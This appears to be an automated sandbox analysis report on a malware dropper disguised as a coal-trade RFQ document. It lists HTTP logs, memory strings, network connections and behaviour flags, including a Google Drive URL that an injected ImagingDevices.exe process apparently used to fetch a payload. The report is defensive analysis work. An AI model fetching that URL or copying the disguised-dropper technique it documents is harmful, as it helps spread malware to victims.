Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EVkCqVv1897eJvJZ3L6oMnY1tFN%2FTAbFnt7rPJTCDMsa3Zv8DBnwAPjALaFJL8t6IL%2F1bBdxeEWwtcDsku9pgLBnLXdzF%2FxLDnxMtkdiRGt2n4R1Wb6FBnBtIjyw7g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65ed50b640a3a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JT%2B9hc5sBM5UB08Q3ZutarYsJpkM3PNK3%2FOnBacqFCPrTm7OKJxceu1pVsOTvhiAttBJFolTquq%2BQZpF7vtO%2BedxR3fN22LAL2a6ApVgScmrIFPvxA4OthamKEuIEA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65ee37a1f4c2c-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ruB%2BA6eUKSpV6se3ZY7dRsaNkyrkTA%2FKdFLJD89kyJcUyUCB%2FtqgUCtdLJZqSNmgq1%2FjOJRKynr6qI5%2Bl7P%2FqLIr7v25fwaRGG8apptwwlZ1Yrw5WfKnlL%2FdGIQAg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65ee8ca73dad5-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tqQknTWz%2FWLAiiGA069QkAqAyYtq1eKQOsOzRjD3Xj%2FZ3n8F2im4rxLNZq%2BE8MU6wLDyHGG3cxRzTFg%2FhrjLgCoDsopnu2Q2eNJA17zYBkTT92MwhSQp9fbv6620NA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65eed1f7a6c88-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7gjl1bE4A7nKw1PODzROhhxZQOn9Po6XK8MEv%2FHqTu5gc8ovagX6FRbCD1g6mDcDYi6fiW8GBsPZIGuB9g3dL8fOzUcOYPlKmVC%2FU9PO1gy5bXCCtIfOqG1km%2B01fw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65ef1685e25a0-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=05%2BlXzOgwyi2eXdN8rk9pG2m1xO%2Bb7i9gtq5TISIawyJ0BPsP3PmGCjLpDAe975FUH8%2FfQxPhHZSMH5chGQ39aII2L%2BaUmP6XHVy3YzeC52tKw48wBJkbRFcXlw2rA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65ef5bba274c6-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:46 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4BiMeyOedaR%2F2z7FXUJ%2FyM8d1z8%2FUep%2BcatL1Rot%2B%2ByZHrrLoQjCbkOYM4tyIYpeDu7kEQpHnn2FTe2anfDBapMEI%2FtqE19DVLv8cH5n9TlII03HBOqwQYckIGsBWQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65efa0aebd9c1-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ClRLrJJmxHRf4putnpnD1MqsgeHuy7AWt5ripCTkITRlRqGDreCRXHGGA0KwjSS155DlNug2X8VJE%2FlmX3LxYkLQ5DulatoHGABu1bmVOhC%2FYKzEjbatKGxWYHIN9A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65eff3b157439-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2FHva35WBSZiHs9hviUlA0fH%2B%2FV4Nh9htMfkcn8oU6N60IR%2Bg7%2FKvGNiIZ8xytXkKR9zBuU7Hgru%2FUNgOCQENt4C0u%2FwgnmqeSd1r9xiy2RcmsCru6P8rDtCvLuKxQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f0479ff02f1-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:48 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=seKrhkN9wxDNFGwlkR4Bhx8UbN033nJnZkE16NYYploWNtGV7NKTgKfNDCB54ra%2FOxRVbLt8LyKzlVYh4DdR%2F5N9MbF3DjWv2tklBQjHjzmtatutG%2B1lHcVLf5Ec8A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f08c85fdb09-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FICAbrG879P43sAzgwW5yaYzI7Y14%2Fc2CDjURLkiaZFVTg7gy%2Fwbe29n73EIwtQ1NzAmMBWZmkhT0D97BUoZPW8iTvf3GEd7mk2mBYgPIuB7jiFBC4MVwkaK5YLbaA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f0d0b1a3343-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IcOJmt8sP3AD%2FYFrK%2BN4lUGIvnJEbkm3%2BQ%2BKVD2RBcpKgXum0WtM4GYR0kQlBwTMDzzIMGcGMioq75A3jPllIVO3mrXGCaHMGKTpQx221ZGUBXw%2BBGTS2TjU57O2wQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f1159e75c83-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J53lmMoOVYYdDgF8ud3UdC%2Bc7Sz%2BaJhskrn%2FDZDy0HRd%2FprbQPOUz5%2BGsI7u7JwN3Be0Ly9bwZHhlJ%2FadFLDCfI6f7WnrTsy%2FgrHC%2FbeRyVDf4QzFLlBSnPVGWJMQg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f159cb221c1-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6eGOCkzBd5Ke%2Bf1rkXVF%2BxwvMrZnWOJUfxAYlfaxGj5RvhQfXHgoduASpfCQKmVJ98NoF%2BC1D%2FYOz1MwMDThsZX0Cn5gXYHf4nH0FH4rvMR3%2F1%2FK4t8JvZ25MCTiiQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f19e95ada6b-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ymViJek2y00Atup94h4SudVDqS2HOD6eTlfQ%2B8%2F%2F3nT0qyEh1LFEsYQoLWRqg87Qwf4rTPsDbGTcpnFqRfSCDuzRz77%2F9DgawSrsr7czLJgsTeJ3lgn7QmC4kwDLbw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f1e3b4a4c06-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q9nhg1Ixs%2BcsBj%2F%2BNjkrbRBMhp5L5SQV%2FsG7DelE6w3JuqxDe2fEMhEiPeOcvrThdaP7MOXZRT8D%2B9E7UYogTCEB3FdQqxNN80%2B0HG0Ddax5ZBxpn0Iq%2F2%2F5dprmMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f236fc15c63-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nF%2BI4v6Oho8TcHwftBCAWVGBhi0xOP80qDwiAEaM%2BrijBL3nSYnweSRyw4hvgg3GOPLjGWuveGM0HcheEGG9Cfci0G8WJcCFT0y6EjRNOAFKKV4DmJiQ4ZxHrPGPpg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f27a8bb7472-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dXvuLuk%2FtKaaQqwvNNJcTfDNTrOcakR1UN4V7TR6uQuIgwV3ttheCnygu6003z0j5lCzG5pqxdAYwraqNSGgsir8hBv9I3UTIw%2BOxusJ%2B%2FavaieePQOSxMUi4SCONw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f2bfffa497c-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7tYtssK7uJq3DXh6zahUCbNETeWjAefKvu0fo9FPN3jUK%2F76CfWo4Wuo7QCJC5S%2Fmgkn4qh85t1rmnYUVRq0iPovOBOzHUkI9cW%2BUGfISqtkwuq2UPZJNJwm8hymmw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f312a1d7418-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2QszoxKQCc2b1auJT5434FSGfZkch8mryhCbSOCW7UGbUFunA5RhXrTs23h5kuuLfr6HT84KibG8LLtZ%2B66%2BY0tIAZCoqNzSMpzuGZncETy1L%2BugmtJ5JrnrAWge5A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f357c9e221a-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EbOrgyQagV%2FFk4O%2F%2BuRXffHv0MgUkmEayToTQkHPhd9Yl5GjtTveMtnE9Ldm5CW2PnktIIaDZ2pxQKPvGs%2BgJY7bFsDWhrDJiDfrVeaN%2Bna4dCliMSe%2B4zHjFRey8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f39cafcdad1-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Apr 2024 04:38:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHys8cOvye1zpW0pM3UBsVO9ARVWUIxG9y10qWopuPGzEYEYzZ1kdIz8w4cmo99R%2FreiwwqiDWL6PGNa7CXyGljHdWHYhJ8vkA%2FCgwNbaMMiYTl8v2uOZBschIq9nA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 86e65f3e29318756-MIAalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: powershell.exe, 00000001.00000002.1923493560.0000000007207000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe, RFQ-SulselBarruII2-COALCOMMLDOC.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.1922214480.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.1920159681.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe, RFQ-SulselBarruII2-COALCOMMLDOC.exe.1.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe, RFQ-SulselBarruII2-COALCOMMLDOC.exe.1.dr	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000001.00000002.1920159681.0000000004A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe, RFQ-SulselBarruII2-COALCOMMLDOC.exe.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe, RFQ-SulselBarruII2-COALCOMMLDOC.exe.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe, RFQ-SulselBarruII2-COALCOMMLDOC.exe.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000001.00000002.1920159681.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1920159681.0000000004A71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: ImagingDevices.exe, 00000013.00000003.1894904693.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003DEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.1922214480.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1922214480.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1922214480.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe, RFQ-SulselBarruII2-COALCOMMLDOC.exe.1.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe, RFQ-SulselBarruII2-COALCOMMLDOC.exe.1.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: RFQ-SulselBarruII2-COALCOMMLDOC.exe, RFQ-SulselBarruII2-COALCOMMLDOC.exe.1.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: ImagingDevices.exe, 00000013.00000002.2864657089.0000000003D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: ImagingDevices.exe, 00000013.00000002.2864657089.0000000003D98000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864921936.00000000056F0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7
Source: ImagingDevices.exe, 00000013.00000002.2864657089.0000000003D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7.
Source: ImagingDevices.exe, 00000013.00000002.2864657089.0000000003D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7?
Source: ImagingDevices.exe, 00000013.00000002.2864657089.0000000003D98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7R
Source: ImagingDevices.exe, 00000013.00000003.1919299683.0000000003E06000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003E01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: ImagingDevices.exe, 00000013.00000003.1894904693.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003DEF000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000003.1919299683.0000000003E06000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003E01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7&export=download
Source: ImagingDevices.exe, 00000013.00000003.1919299683.0000000003E06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=13d3vSnnnSqPQHvAKGjzAcgNiA-IC-wI7&export=downloade
Source: powershell.exe, 00000001.00000002.1920159681.0000000004BC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1922214480.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: ImagingDevices.exe, 00000013.00000003.1894904693.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003DEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: ImagingDevices.exe, 00000013.00000003.1894904693.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003DEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: ImagingDevices.exe, 00000013.00000003.1894904693.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003DEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: ImagingDevices.exe, 00000013.00000003.1894904693.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003DEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: ImagingDevices.exe, 00000013.00000003.1894904693.0000000003E45000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000013.00000002.2864657089.0000000003DEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 192.178.50.78:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.178.50.65:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: C:\Users\user\Desktop\RFQ-SulselBarruII2-COALCOMMLDOC.exe

Code function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004056E5

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: RFQ-SulselBarruII2-COALCOMMLDOC.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

